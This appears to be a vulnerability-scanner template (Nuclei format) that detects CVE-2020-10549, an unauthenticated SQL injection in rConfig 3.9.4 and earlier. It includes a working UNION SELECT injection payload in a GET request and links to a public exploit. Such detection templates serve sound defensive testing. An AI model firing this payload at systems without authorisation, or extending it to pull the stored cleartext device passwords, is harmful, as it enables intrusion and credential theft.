id: CVE-2020-10549 info: name: rConfig <=3.9.4 - SQL Injection author: madrobot severity: critical description: rConfig 3.9.4 and prior has unauthenticated snippets.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-10549 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-10549 cwe-id: CWE-89,CWE-522 tags: cve,cve2020,rconfig,sqli requests: - method: GET path: - "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "[project-discovery]" part: body # Enhanced by mp on 2022/04/21